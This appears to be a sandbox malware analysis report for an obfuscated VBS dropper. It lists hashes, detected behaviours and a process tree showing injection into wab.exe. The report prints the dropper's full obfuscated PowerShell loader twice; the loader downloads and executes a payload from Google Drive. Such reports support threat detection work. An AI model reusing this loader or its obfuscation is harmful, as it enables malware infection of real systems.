05a2aa7be4bb637d6fd522232869d3d194769d985b886cdbf3cf87f0792f1cbc

Analysis

max time kernel
149s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
01/06/2024, 18:04

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

05a2aa7be4bb637d6fd522232869d3d194769d985b886cdbf3cf87f0792f1cbc.vbs
Size

1.1MB
MD5

57a36968f0c63c5a762009b942b97815
SHA1

af02b89ba1d662e9c5623e44d65a1fa62820acea
SHA256

05a2aa7be4bb637d6fd522232869d3d194769d985b886cdbf3cf87f0792f1cbc
SHA512

50f4b31a8f3c07357808d0c73e2e21321fbb9cb0e7fd9098bbeb0012c96abb9ee4998bafec78ac209971dda3b40262af04874cf99f2f5c5f670205109a7f691b
SSDEEP

12288:X31cvBzbU01qal638iNX3iTMgmuYtWN/ZgMiQPeRjcY:XYz64+2SjcY

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	2468	powershell.exe
10	2468	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
8	drive.google.com
27	drive.google.com

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4412	powershell.exe
4556	ImagingDevices.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4412 set thread context of 4556	4412	powershell.exe	108

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2468	powershell.exe
2468	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe

Suspicious behavior: MapViewOfSection 12 IoCs

pid	Process
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 5076 wrote to memory of 2468	5076	WScript.exe	81
PID 5076 wrote to memory of 2468	5076	WScript.exe	81
PID 2468 wrote to memory of 4400	2468	powershell.exe	84
PID 2468 wrote to memory of 4400	2468	powershell.exe	84
PID 2468 wrote to memory of 4412	2468	powershell.exe	92
PID 2468 wrote to memory of 4412	2468	powershell.exe	92
PID 2468 wrote to memory of 4412	2468	powershell.exe	92
PID 4412 wrote to memory of 3096	4412	powershell.exe	94
PID 4412 wrote to memory of 3096	4412	powershell.exe	94
PID 4412 wrote to memory of 3096	4412	powershell.exe	94
PID 4412 wrote to memory of 2816	4412	powershell.exe	97
PID 4412 wrote to memory of 2816	4412	powershell.exe	97
PID 4412 wrote to memory of 2816	4412	powershell.exe	97
PID 4412 wrote to memory of 1932	4412	powershell.exe	98
PID 4412 wrote to memory of 1932	4412	powershell.exe	98
PID 4412 wrote to memory of 1932	4412	powershell.exe	98
PID 4412 wrote to memory of 3540	4412	powershell.exe	99
PID 4412 wrote to memory of 3540	4412	powershell.exe	99
PID 4412 wrote to memory of 3540	4412	powershell.exe	99
PID 4412 wrote to memory of 2160	4412	powershell.exe	100
PID 4412 wrote to memory of 2160	4412	powershell.exe	100
PID 4412 wrote to memory of 2160	4412	powershell.exe	100
PID 4412 wrote to memory of 224	4412	powershell.exe	101
PID 4412 wrote to memory of 224	4412	powershell.exe	101
PID 4412 wrote to memory of 224	4412	powershell.exe	101
PID 4412 wrote to memory of 4508	4412	powershell.exe	102
PID 4412 wrote to memory of 4508	4412	powershell.exe	102
PID 4412 wrote to memory of 4508	4412	powershell.exe	102
PID 4412 wrote to memory of 4848	4412	powershell.exe	103
PID 4412 wrote to memory of 4848	4412	powershell.exe	103
PID 4412 wrote to memory of 4848	4412	powershell.exe	103
PID 4412 wrote to memory of 5056	4412	powershell.exe	104
PID 4412 wrote to memory of 5056	4412	powershell.exe	104
PID 4412 wrote to memory of 5056	4412	powershell.exe	104
PID 4412 wrote to memory of 3848	4412	powershell.exe	105
PID 4412 wrote to memory of 3848	4412	powershell.exe	105
PID 4412 wrote to memory of 3848	4412	powershell.exe	105
PID 4412 wrote to memory of 4960	4412	powershell.exe	106
PID 4412 wrote to memory of 4960	4412	powershell.exe	106
PID 4412 wrote to memory of 4960	4412	powershell.exe	106
PID 4412 wrote to memory of 3992	4412	powershell.exe	107
PID 4412 wrote to memory of 3992	4412	powershell.exe	107
PID 4412 wrote to memory of 3992	4412	powershell.exe	107
PID 4412 wrote to memory of 4556	4412	powershell.exe	108
PID 4412 wrote to memory of 4556	4412	powershell.exe	108
PID 4412 wrote to memory of 4556	4412	powershell.exe	108
PID 4412 wrote to memory of 4556	4412	powershell.exe	108
PID 4412 wrote to memory of 4556	4412	powershell.exe	108

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\05a2aa7be4bb637d6fd522232869d3d194769d985b886cdbf3cf87f0792f1cbc.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tonere = 1;Function Magnolies($Fagspecifik){$Nitritter=$Fagspecifik.Length-$Tonere;$Eksegese='Substring';For( $Udfladnings=7;$Udfladnings -lt $Nitritter;$Udfladnings+=8){$sikkerhedspolitiske+=$Fagspecifik.$Eksegese.Invoke( $Udfladnings, $Tonere);}$sikkerhedspolitiske;}function Fugtighedskremernes($Rwd){ .($Dnomiske) ($Rwd);}$Drizzled=Magnolies 'GlggensMb uffmao Afst,ez Uegenni Troubllvo.sfigltotalliaUncerem/ ditike5Clutchy.Sammenk0Antikon Indsyed( O.dinaWSubfunciSproggen.nkslibdSp ldevoHo.edfawVoldgifsHes.ebr generouN FderalTThirdne Nedste 1Linjxor0 Opensu. M ropl0Spinaen; Me,mho GuldengW Sensibi PaucilnCuspida6 En ier4sadduki;Mellems B odtrxAllevia6Cowpun 4m senro; Gl.sse Hymnle,rConsortvInkamin:Multivo1Adventi2Rota.et1 Varigh.fortrin0Karoles)Branchi fette,eG Stronte Hangi c Fo etek Admirao Sugger/,abnern2.atmake0W ngies1Hyperme0Voldeli0 Gifted1,kkener0.sblokk1Carbona RollickF Attenai afkrimrDatterse IntervflugandaoHaslevsxUndergr/R.eumat1Barmhje2 Vedvar1Baud ry..raeben0 reatmo ';$Caruage=Magnolies 'ProgramUSummaspsSnksmedeComplairLedsage-HarpiksA Opkbteg BinotyeNedvr inKulds rtFladblg ';$Outcome=Magnolies ' Telfonh.uperint LibyaitUmbellup BriefesBrooms,:Intrafu/Stnk ko/Nonconcd Electrr,utsteaiunsinkav CirculeTraa.vr.Roacheqg SaloonoPublishoCladblogAnkerkdlWithst,eHype fl. nmonascUnexpuro TyrkermUdgydel/dods.niu PlumlecSeptisk?bru erheFagkritxDiscordp B ruseoP astter.sosulptEpinast= fsknid ContraoSnoretrwfeminisnHerschvlDrikkevoIdrtsanaEtymolod .rossi&Fend asi Ost.ocd mash.k=Oraclep1Es,alata IndustV Unint,t Pahautzboxw.odMObnebulrpseudoceFarfe cFBilledraDdsikkedProglotFb,rometK Una,taSDusiner5Sk.mterDSlutspi4Sotena.2impostu0 .orali9BrysthoXDysyntrKKnsdis uStemm,pfNeoph,b4 achte.4Indtrric NvneretCondu tuEjerbolpHemapoirAquaculMBatikfaB Unn,rm ';$Ol=Magnolies ' Disper> Monark ';$Dnomiske=Magnolies 'Ro tefri Tita,oeThreefoxDi,crit ';$Surat182='Sermonizers';$Intends = Magnolies 'firdobleSmaattecInddatahSpndvido amphi Antifor%attraktaAngel epRundendpVoluti.dCascadaastjern.tHovedkaaAll rti%Calfbou\me,oranITophescnD,gdraadmalro aoAlbshutk ForskntDiskettr BaysmeiD,tpalmn Str ndeBrug.rdrJusterieAnthropd,ulphoae Lik,ids Kredit.RingridMCollimauDob,eltsVedgaae Ubevis&.abatmr&Bawdrie KogendeeSkrammecP,ngepuhBryggero Peda f Mcgra tStatist ';Fugtighedskremernes (Magnolies ' Kjensv$irvin.sg Kromchl tockhooaegeriibMer,tlea Juicefl Tr.ska: BrugtvVLeukocyeNonfloarPi,ligesSubtrouiStykvrkfConvolui fterspeM,racasr,angiumsReincur= Haandv( DioramcMetepenm XanthodAlk.ant Nitritt/NathalicKlarlgg Genski$HavfladIA,dressnSporingtSenge de a.skalnNdlgnendTop rissSiensch) Ba.low ');Fugtighedskremernes (Magnolies 'Sini is$ Befr,gg lderbrlSkatteuoTroldkrb SpildeaMudrepolSouthwe:Le geddIAbsurd nEpi iordNoncontbEm.lastrSaccus,uOpklbeod EmancisBsselbetKundegrySkridttvOctodoneStockcarHorologiLjerl.gepeniblerRevocatnUnsepuleSeafloo= Spondy$T naalsOreimkenuve ticitUncinatcLombardo,unktiom Komforevulpecu.Cir,umtsParomoepUl.kkeslStu,tisiAveragetKlippe (Udhvile$S,eboldO AarskolRupiaca)Komaern ');$Outcome=$Indbrudstyverierne[0];$Bagmur= (Magnolies ' Ks.nsd$pallahbgOmgivell No.assoAlpenstbStoreblaVaporiml Taabel:ReptilsROstedmio Fangarm FilarmaSknhedsnGen emblG,stikmyTrste p=FrastdeN Go,veteM tachrwSkikke - UrimelOAf.rogrbCat.chrjDistribe DefroscBrnelamtOgumbor TvisteSSullageyKonfitus ExocoltBroccoleBennet mMat,iar.PestereN DigesteCanostatChlorp .GlossoiW PelsbeeSocialsb LustinCMiniskilSc.ofuliUdbankeeDingwalnCroqu.et');$Bagmur+=$Versifiers[1];Fugtighedskremernes ($Bagmur);Fugtighedskremernes (Magnolies 'Forgive$generinR undhedoSuperinmTrullada SlaasknmeteyarlFunktioypaalide. CrossoHNew,angeDantedra DiacetdBedeslaeChedreurPlattess Proble[Bortfor$ GroatsC Ultrada Socio rErindriuCh rdopa At amagSvigteseAabning]Indtru.=Mislang$ Bonn.kD Fodrodr Samle,iHem.olizK nkurszMikkalalLysbehaeAgterspd Tape,s ');$Tegnstoerrelse=Magnolies 'D,ibble$MacroscR Spilt oInexpedmAutorisaPentadan cytostlThe logyNotewor. SulphaD AmatrooMon.stdw KirsefnBlanderl midsizounincluashopwe,dDisgustFOvera,tiLikeminlArvemoneAargang(Kokotte$FilterhOligati,uskistavtVekselrckont,ntoHavebrumFortrsteConvinc,Overmen$bvseneeCspeciala MyotickStubbekcAktivithFremstdiDistritkmonse geUndladel Fidibu)Toppunk ';$Cakchikel=$Versifiers[0];Fugtighedskremernes (Magnolies 'Givne,e$Traute gScrawlylWee esso DolittbFiskalea Karretl Kino,l:OpgavefHMeibomiaTre keraJaniss.rFuttogesLgenstabSympatirBardu ee SyntakdKl,ppeb= Subjug(SorelprTI.dvirkeSvined,sSparsestRegalva-Cryoge,PLude,kaa Degen.tKildeteh Hypoph Cudgel$Ha.medeCEpigramaLiquidikSvirp tcIntercehReignedi LempelkSixteeneUhensigl Overme)Pendant ');while (!$Haarsbred) {Fugtighedskremernes (Magnolies 'Hangare$tropiklgErnringlSkudstro TamonebquannetaIndkaldl Lumino:Parlam Snap thiuInstiturInduceac Lan,loiWat,rdensulfindg ,arthilVerisimeFarveri=demonic$Upp,rcatIndlggerSu ersuu Petrole Skatte ') ;Fugtighedskremernes $Tegnstoerrelse;Fugtighedskremernes (Magnolies ' KamavaSStilstatNizi ataAmtsgodrB gaaentbredba -PollinoSPeacelel R.stere TugtemeRiffenepSagnom Artless4Femal.z ');Fugtighedskremernes (Magnolies 'Y.msesi$Te tplegDiolperlKnal,eno RegnvabNullipoaResultalKatekis:MaadersHRehabila,etasseaSledginrTing,stscocainibAbsorptrC llaydeOut houdapperce=Fist ls(SkemalaTAmoebiaeChlorelsMu.tinetHattepu-Cha.acuPD,sillua SatiritVoldgifhCompl.i Airth i$ Rege,eCUniqueraFluevgtksuberizcSikk rhhGing viiGrimedjkSemitexePro opllRelatio) Unconv ') ;Fugtighedskremernes (Magnolies 'Vandmll$FeverfegFr.idhol,assivao vizoreb RntgenaBoggs il Preabu:PsychodTConsultrTorsad oRoanokelSt emesd TimokrkAhorntrlDingoerlMidwifei,rvlevenElegiergTenoplaeJodtinkrTroskabn robusieE,terresFaxers.2Genicul4tupianz5Wh.lvea=Bdeprak$ FrekvegRaketvrlSymbr.no Nonsufb DemissaSterililBaadt,p:KoreogrTHovereroUnhouser,xorhasp Snob.ee AgglomrN,rveannUbesluteFro.tbi+Branch +Wearabl%a.senil$ HjtstaI nurse,nskrmdiadSortk.nbMellemkr ,avsrauSchalbudRhabdoms OvervatVildt,oyBrnefl,vStru,teeKn,trmprBiografiTractabeToldposrP,ausibn Fanfare.riksek. ,jendocFeldspao FerineuVandelanCalycoztPrventi ') ;$Outcome=$Indbrudstyverierne[$Troldkllingernes245];}$Beredskabsplanlgningers=352180;$kartotekskortene=30653;Fugtighedskremernes (Magnolies 'Flu.elh$,oometrgTemporal Ox.aceo DifterbUnconceaOndsindlBedroo,:pa,agraULimacindSexualimDisserta Kvin etGe rgiatSammenreKristnel SocioesTeoretie DelagtsUlbertok UnpredrEkspedtiPrajapagtrailt.e RingbanisoamideRa finasUanfgte Uropfre=Sikkerh PinscheGSanseree Uncropt Harver-Skri.emCModtageoAds rptn,ntennetSpisesaeLill,punNonde utCrestle cand el$HalvmaaCSpidsvia ViverikTownhoocMa.theshFae.dstiTalehrekSlickeneMinefarlagitere ');Fugtighedskremernes (Magnolies 'Udsving$Velfrdsg ProsyllGipsplaoUlavegebStationaArthroplKendric: calcanLAnlgsakaTsotsienPeberfrg PlovfufDittanyiUnbathenvirksomgVideopleKoldstar TrucebeDressu,nTegnendsB sidde Inhoop=udstukk Cosecan[LabruscSHymenopyIndiffesMetempstOpposite NondelmLa hesf.EnjoyabCDjurslao .undsknBefle kvOysterreAfspn irImpulsstBlevetb]mucovis:Skudsma:ArbejdsF ruter,rKlassifoGrisk.smB.ygmesBPro,ellaScrewsmsTangen.eGobieso6Elufsve4InformiS Undervt loserer AutocoiUvill gn Fluep.g Mod.st(Skifref$ AfvaskUBjemuskdN jadenmTegngiva ClaymotScherzotPinagt,eFamiliel Sekun.shetero.eStrikvas AgonizkUropsilrKlbem ki St mmegSwanpareSkyttesnBotch.neNattillsAu,okra)Natheti ');Fugtighedskremernes (Magnolies ' Missio$ Ungdo gJavaneslThalas o,naskinb Scarmaa SupposlCircumg:NestoriB CenterlQuinidiiNomogranCobbleskOv.rraueNowyunerNe,traleForretnsstelern Te,kels=Kogebog Unfoil[B evsamSAlbifi,yErnitaxs Puddaatforsknie Klass mLuxesge.RigsarkTIndholdeBankfulx,nemrketVindtrr.UddeligE Trans,nha delscUntar eoKommisedFlovsesi StatusnMiljmingVedbliv] Knased:Tam one:svingarA Teok aSGartnerCFllesbeI,orebilIFedtpro.KonfirmGRay.nereNebulest MohuraSFear,outTanningrUrgeriniMetasomnnskeforgMonomor( Dorlac$ UntempLPavageza SamfunnCambrelgSchizzofNumerisi UnselfnBille,mgMachaireMalm.rsrBusse.seAny ithn Fen.gls Karbur) nation ');Fugtighedskremernes (Magnolies ' Merita$ UngermgPhloro,l Altoiso CampanbDelftsgaMaskinflS etosk:Un ungmESorbolux bankmahFillagru mythopmBervel,eSolmodndsovemed=Flkkens$FurfibrBCor ophlMetronyiBlankernChuserck Ligesae FriendrAffald eKonservsCyclamm.,ntisensTrottleuTakkernbCantraisgalaxiatProethnr OmdbniiPaxillunIsopsepgSantour( dgnrap$ Frdi,bBRandsyneFibrillrBe.eficeResolicd HeptamsSubcompk T xtroafim,riabAlfonsos isexpepFangedrlDu,hgssaRigmaronPrinterlDisten.gUngues,nSubsi.iiBrai wanRubrishg,ilhugge .onvicr Prorhis Twoeso,Stregko$UnbrighkSubstraaMonoecyrRytter.t Casimeo raflytt Un.ooteClamorokSoltimes Smaglsk SportsoUndu,anreored.atSpaadomeRepsfden MicrobeEvasive)Cloudli ');Fugtighedskremernes $Exhumed;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indoktrineredes.Mus && echo t"
    3⤵
    PID:4400
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tonere = 1;Function Magnolies($Fagspecifik){$Nitritter=$Fagspecifik.Length-$Tonere;$Eksegese='Substring';For( $Udfladnings=7;$Udfladnings -lt $Nitritter;$Udfladnings+=8){$sikkerhedspolitiske+=$Fagspecifik.$Eksegese.Invoke( $Udfladnings, $Tonere);}$sikkerhedspolitiske;}function Fugtighedskremernes($Rwd){ .($Dnomiske) ($Rwd);}$Drizzled=Magnolies 'GlggensMb uffmao Afst,ez Uegenni Troubllvo.sfigltotalliaUncerem/ ditike5Clutchy.Sammenk0Antikon Indsyed( O.dinaWSubfunciSproggen.nkslibdSp ldevoHo.edfawVoldgifsHes.ebr generouN FderalTThirdne Nedste 1Linjxor0 Opensu. M ropl0Spinaen; Me,mho GuldengW Sensibi PaucilnCuspida6 En ier4sadduki;Mellems B odtrxAllevia6Cowpun 4m senro; Gl.sse Hymnle,rConsortvInkamin:Multivo1Adventi2Rota.et1 Varigh.fortrin0Karoles)Branchi fette,eG Stronte Hangi c Fo etek Admirao Sugger/,abnern2.atmake0W ngies1Hyperme0Voldeli0 Gifted1,kkener0.sblokk1Carbona RollickF Attenai afkrimrDatterse IntervflugandaoHaslevsxUndergr/R.eumat1Barmhje2 Vedvar1Baud ry..raeben0 reatmo ';$Caruage=Magnolies 'ProgramUSummaspsSnksmedeComplairLedsage-HarpiksA Opkbteg BinotyeNedvr inKulds rtFladblg ';$Outcome=Magnolies ' Telfonh.uperint LibyaitUmbellup BriefesBrooms,:Intrafu/Stnk ko/Nonconcd Electrr,utsteaiunsinkav CirculeTraa.vr.Roacheqg SaloonoPublishoCladblogAnkerkdlWithst,eHype fl. nmonascUnexpuro TyrkermUdgydel/dods.niu PlumlecSeptisk?bru erheFagkritxDiscordp B ruseoP astter.sosulptEpinast= fsknid ContraoSnoretrwfeminisnHerschvlDrikkevoIdrtsanaEtymolod .rossi&Fend asi Ost.ocd mash.k=Oraclep1Es,alata IndustV Unint,t Pahautzboxw.odMObnebulrpseudoceFarfe cFBilledraDdsikkedProglotFb,rometK Una,taSDusiner5Sk.mterDSlutspi4Sotena.2impostu0 .orali9BrysthoXDysyntrKKnsdis uStemm,pfNeoph,b4 achte.4Indtrric NvneretCondu tuEjerbolpHemapoirAquaculMBatikfaB Unn,rm ';$Ol=Magnolies ' Disper> Monark ';$Dnomiske=Magnolies 'Ro tefri Tita,oeThreefoxDi,crit ';$Surat182='Sermonizers';$Intends = Magnolies 'firdobleSmaattecInddatahSpndvido amphi Antifor%attraktaAngel epRundendpVoluti.dCascadaastjern.tHovedkaaAll rti%Calfbou\me,oranITophescnD,gdraadmalro aoAlbshutk ForskntDiskettr BaysmeiD,tpalmn Str ndeBrug.rdrJusterieAnthropd,ulphoae Lik,ids Kredit.RingridMCollimauDob,eltsVedgaae Ubevis&.abatmr&Bawdrie KogendeeSkrammecP,ngepuhBryggero Peda f Mcgra tStatist ';Fugtighedskremernes (Magnolies ' Kjensv$irvin.sg Kromchl tockhooaegeriibMer,tlea Juicefl Tr.ska: BrugtvVLeukocyeNonfloarPi,ligesSubtrouiStykvrkfConvolui fterspeM,racasr,angiumsReincur= Haandv( DioramcMetepenm XanthodAlk.ant Nitritt/NathalicKlarlgg Genski$HavfladIA,dressnSporingtSenge de a.skalnNdlgnendTop rissSiensch) Ba.low ');Fugtighedskremernes (Magnolies 'Sini is$ Befr,gg lderbrlSkatteuoTroldkrb SpildeaMudrepolSouthwe:Le geddIAbsurd nEpi iordNoncontbEm.lastrSaccus,uOpklbeod EmancisBsselbetKundegrySkridttvOctodoneStockcarHorologiLjerl.gepeniblerRevocatnUnsepuleSeafloo= Spondy$T naalsOreimkenuve ticitUncinatcLombardo,unktiom Komforevulpecu.Cir,umtsParomoepUl.kkeslStu,tisiAveragetKlippe (Udhvile$S,eboldO AarskolRupiaca)Komaern ');$Outcome=$Indbrudstyverierne[0];$Bagmur= (Magnolies ' Ks.nsd$pallahbgOmgivell No.assoAlpenstbStoreblaVaporiml Taabel:ReptilsROstedmio Fangarm FilarmaSknhedsnGen emblG,stikmyTrste p=FrastdeN Go,veteM tachrwSkikke - UrimelOAf.rogrbCat.chrjDistribe DefroscBrnelamtOgumbor TvisteSSullageyKonfitus ExocoltBroccoleBennet mMat,iar.PestereN DigesteCanostatChlorp .GlossoiW PelsbeeSocialsb LustinCMiniskilSc.ofuliUdbankeeDingwalnCroqu.et');$Bagmur+=$Versifiers[1];Fugtighedskremernes ($Bagmur);Fugtighedskremernes (Magnolies 'Forgive$generinR undhedoSuperinmTrullada SlaasknmeteyarlFunktioypaalide. CrossoHNew,angeDantedra DiacetdBedeslaeChedreurPlattess Proble[Bortfor$ GroatsC Ultrada Socio rErindriuCh rdopa At amagSvigteseAabning]Indtru.=Mislang$ Bonn.kD Fodrodr Samle,iHem.olizK nkurszMikkalalLysbehaeAgterspd Tape,s ');$Tegnstoerrelse=Magnolies 'D,ibble$MacroscR Spilt oInexpedmAutorisaPentadan cytostlThe logyNotewor. SulphaD AmatrooMon.stdw KirsefnBlanderl midsizounincluashopwe,dDisgustFOvera,tiLikeminlArvemoneAargang(Kokotte$FilterhOligati,uskistavtVekselrckont,ntoHavebrumFortrsteConvinc,Overmen$bvseneeCspeciala MyotickStubbekcAktivithFremstdiDistritkmonse geUndladel Fidibu)Toppunk ';$Cakchikel=$Versifiers[0];Fugtighedskremernes (Magnolies 'Givne,e$Traute gScrawlylWee esso DolittbFiskalea Karretl Kino,l:OpgavefHMeibomiaTre keraJaniss.rFuttogesLgenstabSympatirBardu ee SyntakdKl,ppeb= Subjug(SorelprTI.dvirkeSvined,sSparsestRegalva-Cryoge,PLude,kaa Degen.tKildeteh Hypoph Cudgel$Ha.medeCEpigramaLiquidikSvirp tcIntercehReignedi LempelkSixteeneUhensigl Overme)Pendant ');while (!$Haarsbred) {Fugtighedskremernes (Magnolies 'Hangare$tropiklgErnringlSkudstro TamonebquannetaIndkaldl Lumino:Parlam Snap thiuInstiturInduceac Lan,loiWat,rdensulfindg ,arthilVerisimeFarveri=demonic$Upp,rcatIndlggerSu ersuu Petrole Skatte ') ;Fugtighedskremernes $Tegnstoerrelse;Fugtighedskremernes (Magnolies ' KamavaSStilstatNizi ataAmtsgodrB gaaentbredba -PollinoSPeacelel R.stere TugtemeRiffenepSagnom Artless4Femal.z ');Fugtighedskremernes (Magnolies 'Y.msesi$Te tplegDiolperlKnal,eno RegnvabNullipoaResultalKatekis:MaadersHRehabila,etasseaSledginrTing,stscocainibAbsorptrC llaydeOut houdapperce=Fist ls(SkemalaTAmoebiaeChlorelsMu.tinetHattepu-Cha.acuPD,sillua SatiritVoldgifhCompl.i Airth i$ Rege,eCUniqueraFluevgtksuberizcSikk rhhGing viiGrimedjkSemitexePro opllRelatio) Unconv ') ;Fugtighedskremernes (Magnolies 'Vandmll$FeverfegFr.idhol,assivao vizoreb RntgenaBoggs il Preabu:PsychodTConsultrTorsad oRoanokelSt emesd TimokrkAhorntrlDingoerlMidwifei,rvlevenElegiergTenoplaeJodtinkrTroskabn robusieE,terresFaxers.2Genicul4tupianz5Wh.lvea=Bdeprak$ FrekvegRaketvrlSymbr.no Nonsufb DemissaSterililBaadt,p:KoreogrTHovereroUnhouser,xorhasp Snob.ee AgglomrN,rveannUbesluteFro.tbi+Branch +Wearabl%a.senil$ HjtstaI nurse,nskrmdiadSortk.nbMellemkr ,avsrauSchalbudRhabdoms OvervatVildt,oyBrnefl,vStru,teeKn,trmprBiografiTractabeToldposrP,ausibn Fanfare.riksek. ,jendocFeldspao FerineuVandelanCalycoztPrventi ') ;$Outcome=$Indbrudstyverierne[$Troldkllingernes245];}$Beredskabsplanlgningers=352180;$kartotekskortene=30653;Fugtighedskremernes (Magnolies 'Flu.elh$,oometrgTemporal Ox.aceo DifterbUnconceaOndsindlBedroo,:pa,agraULimacindSexualimDisserta Kvin etGe rgiatSammenreKristnel SocioesTeoretie DelagtsUlbertok UnpredrEkspedtiPrajapagtrailt.e RingbanisoamideRa finasUanfgte Uropfre=Sikkerh PinscheGSanseree Uncropt Harver-Skri.emCModtageoAds rptn,ntennetSpisesaeLill,punNonde utCrestle cand el$HalvmaaCSpidsvia ViverikTownhoocMa.theshFae.dstiTalehrekSlickeneMinefarlagitere ');Fugtighedskremernes (Magnolies 'Udsving$Velfrdsg ProsyllGipsplaoUlavegebStationaArthroplKendric: calcanLAnlgsakaTsotsienPeberfrg PlovfufDittanyiUnbathenvirksomgVideopleKoldstar TrucebeDressu,nTegnendsB sidde Inhoop=udstukk Cosecan[LabruscSHymenopyIndiffesMetempstOpposite NondelmLa hesf.EnjoyabCDjurslao .undsknBefle kvOysterreAfspn irImpulsstBlevetb]mucovis:Skudsma:ArbejdsF ruter,rKlassifoGrisk.smB.ygmesBPro,ellaScrewsmsTangen.eGobieso6Elufsve4InformiS Undervt loserer AutocoiUvill gn Fluep.g Mod.st(Skifref$ AfvaskUBjemuskdN jadenmTegngiva ClaymotScherzotPinagt,eFamiliel Sekun.shetero.eStrikvas AgonizkUropsilrKlbem ki St mmegSwanpareSkyttesnBotch.neNattillsAu,okra)Natheti ');Fugtighedskremernes (Magnolies ' Missio$ Ungdo gJavaneslThalas o,naskinb Scarmaa SupposlCircumg:NestoriB CenterlQuinidiiNomogranCobbleskOv.rraueNowyunerNe,traleForretnsstelern Te,kels=Kogebog Unfoil[B evsamSAlbifi,yErnitaxs Puddaatforsknie Klass mLuxesge.RigsarkTIndholdeBankfulx,nemrketVindtrr.UddeligE Trans,nha delscUntar eoKommisedFlovsesi StatusnMiljmingVedbliv] Knased:Tam one:svingarA Teok aSGartnerCFllesbeI,orebilIFedtpro.KonfirmGRay.nereNebulest MohuraSFear,outTanningrUrgeriniMetasomnnskeforgMonomor( Dorlac$ UntempLPavageza SamfunnCambrelgSchizzofNumerisi UnselfnBille,mgMachaireMalm.rsrBusse.seAny ithn Fen.gls Karbur) nation ');Fugtighedskremernes (Magnolies ' Merita$ UngermgPhloro,l Altoiso CampanbDelftsgaMaskinflS etosk:Un ungmESorbolux bankmahFillagru mythopmBervel,eSolmodndsovemed=Flkkens$FurfibrBCor ophlMetronyiBlankernChuserck Ligesae FriendrAffald eKonservsCyclamm.,ntisensTrottleuTakkernbCantraisgalaxiatProethnr OmdbniiPaxillunIsopsepgSantour( dgnrap$ Frdi,bBRandsyneFibrillrBe.eficeResolicd HeptamsSubcompk T xtroafim,riabAlfonsos isexpepFangedrlDu,hgssaRigmaronPrinterlDisten.gUngues,nSubsi.iiBrai wanRubrishg,ilhugge .onvicr Prorhis Twoeso,Stregko$UnbrighkSubstraaMonoecyrRytter.t Casimeo raflytt Un.ooteClamorokSoltimes Smaglsk SportsoUndu,anreored.atSpaadomeRepsfden MicrobeEvasive)Cloudli ');Fugtighedskremernes $Exhumed;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4412
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indoktrineredes.Mus && echo t"
      4⤵
      PID:3096
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:2816
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:1932
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:3540
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:2160
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:224
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:4508
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:4848
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:5056
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:3848
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:4960
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:3992
